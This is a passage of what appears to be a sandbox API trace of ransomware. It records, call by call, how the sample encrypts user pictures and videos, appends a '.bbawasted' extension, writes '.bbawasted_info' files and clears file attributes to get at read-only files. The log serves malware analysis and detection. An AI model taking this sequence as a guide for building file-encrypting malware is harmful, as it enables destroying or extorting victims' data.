dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.216] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5c6ff0 | out: hHeap=0x580000) returned 1 [0076.216] lstrcpyW (in: lpString1=0x5bf110, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.216] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\-G40a_oPR4.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\-g40a_opr4.bmp"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\-G40a_oPR4.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\-g40a_opr4.bmp.bbawasted")) returned 1 [0076.217] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\-G40a_oPR4.bmp.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\-g40a_opr4.bmp.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.217] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.219] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.220] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.220] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.220] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.221] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.221] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.276] SetEndOfFile (hFile=0x11c) returned 1 [0076.278] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.278] CloseHandle (hObject=0x11c) returned 1 [0076.280] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.280] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.281] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.281] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.281] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\wthAMgNSF09W7X.gif") returned 84 [0076.281] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b2) returned 0x5bf070 [0076.281] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.281] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.281] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.282] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.282] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.282] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\wthAMgNSF09W7X.gif.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\wthamgnsf09w7x.gif.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.282] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.283] SetEndOfFile (hFile=0x11c) returned 1 [0076.283] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.283] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.283] lstrcpyW (in: lpString1=0x5bf118, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.283] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\wthAMgNSF09W7X.gif" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\wthamgnsf09w7x.gif"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\wthAMgNSF09W7X.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\wthamgnsf09w7x.gif.bbawasted")) returned 1 [0076.284] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\rX0ekrkM0KeKr 4pn\\wthAMgNSF09W7X.gif.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\rx0ekrkm0kekr 4pn\\wthamgnsf09w7x.gif.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.284] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.286] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.287] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.287] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.287] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.288] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.288] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.297] SetEndOfFile (hFile=0x11c) returned 1 [0076.300] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.300] CloseHandle (hObject=0x11c) returned 1 [0076.302] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.302] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.303] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.303] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.303] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\Wd24fE52d7w0n.jpg") returned 65 [0076.303] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x28c) returned 0x5bf070 [0076.303] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.303] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.303] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.304] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.304] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.304] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\Wd24fE52d7w0n.jpg.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\wd24fe52d7w0n.jpg.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.305] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.306] SetEndOfFile (hFile=0x11c) returned 1 [0076.306] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.306] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.306] lstrcpyW (in: lpString1=0x5bf0f2, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.306] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\Wd24fE52d7w0n.jpg" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\wd24fe52d7w0n.jpg"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\Wd24fE52d7w0n.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\wd24fe52d7w0n.jpg.bbawasted")) returned 1 [0076.307] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Pictures\\TMvN\\Wd24fE52d7w0n.jpg.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\pictures\\tmvn\\wd24fe52d7w0n.jpg.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.307] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.309] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.310] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.310] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.310] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.311] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.311] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.367] SetEndOfFile (hFile=0x11c) returned 1 [0076.369] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.369] CloseHandle (hObject=0x11c) returned 1 [0076.371] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.371] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.372] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.372] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.373] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms") returned 70 [0076.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x296) returned 0x5bf070 [0076.373] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.373] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.373] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.374] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.374] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.374] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.374] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.375] SetEndOfFile (hFile=0x11c) returned 1 [0076.376] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.376] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.376] lstrcpyW (in: lpString1=0x5bf0fc, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.376] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.bbawasted")) returned 1 [0076.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0076.377] GetLastError () returned 0x5 [0076.377] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.bbawasted")) returned 0x23 [0076.377] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted", dwFileAttributes=0x22) returned 1 [0076.377] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\indexed locations.search-ms.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xfc [0076.377] CreateFileMappingW (hFile=0xfc, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xf8 [0076.378] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\Indexed Locations.search-ms.bbawasted", dwFileAttributes=0x23) returned 1 [0076.378] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x200) returned 0x5d0700 [0076.378] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.379] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.379] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.379] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.380] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.380] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.388] SetEndOfFile (hFile=0x11c) returned 1 [0076.390] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.390] CloseHandle (hObject=0x11c) returned 1 [0076.392] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0076.392] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.393] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.393] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.393] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tPFW99ag-yxfOFr.mp4") returned 61 [0076.393] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x284) returned 0x5abe80 [0076.393] lstrcpyW (in: lpString1=0x5abefa, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.393] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.393] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.394] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.394] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.394] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tPFW99ag-yxfOFr.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tpfw99ag-yxfofr.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.394] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.396] SetEndOfFile (hFile=0x11c) returned 1 [0076.396] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.396] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.396] lstrcpyW (in: lpString1=0x5abefa, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.396] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tPFW99ag-yxfOFr.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tpfw99ag-yxfofr.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tPFW99ag-yxfOFr.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tpfw99ag-yxfofr.mp4.bbawasted")) returned 1 [0076.397] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2tPFW99ag-yxfOFr.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2tpfw99ag-yxfofr.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.397] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.400] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5d0908) returned 1 [0076.401] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x1b8, pbBuffer=0x5d0748 | out: pbBuffer=0x5d0748) returned 1 [0076.401] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.401] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5d0908) returned 1 [0076.402] CryptGenRandom (in: hProv=0x5d0908, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0076.402] CryptReleaseContext (hProv=0x5d0908, dwFlags=0x0) returned 1 [0076.411] SetEndOfFile (hFile=0x11c) returned 1 [0076.458] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.458] CloseHandle (hObject=0x11c) returned 1 [0076.459] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5abe80 | out: hHeap=0x580000) returned 1 [0076.459] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0076.460] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0076.460] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.460] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\epYFlq3QpHuldd3.mp4") returned 60 [0076.460] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x282) returned 0x5abe80 [0076.460] lstrcpyW (in: lpString1=0x5abef8, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0076.460] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5b8940 [0076.461] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0076.461] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5b8940 | out: pbBuffer=0x5b8940) returned 1 [0076.461] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.461] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\epYFlq3QpHuldd3.mp4.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\epyflq3qphuldd3.mp4.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0076.462] WriteFile (in: hFile=0x11c, lpBuffer=0x5b8940*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5b8940*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0076.463] SetEndOfFile (hFile=0x11c) returned 1 [0076.463] SetFilePointer (in: hFile=0x11c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0076.463] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5b8940 | out: hHeap=0x580000) returned 1 [0076.463] lstrcpyW (in: lpString1=0x5abef8, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0076.463] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\epYFlq3QpHuldd3.mp4" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\epyflq3qphuldd3.mp4"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\epYFlq3QpHuldd3.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\epyflq3qphuldd3.mp4.bbawasted")) returned 1 [0076.464] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\epYFlq3QpHuldd3.mp4.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\epyflq3qphuldd3.mp4.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xf8 [0076.464] CreateFileMappingW (hFile=0xf8, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0xfc [0076.466] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0076.466] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5dd658 | out: pbBuffer=0x5dd658) returned 1 [0076.466] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0076.466] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0076.467] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, 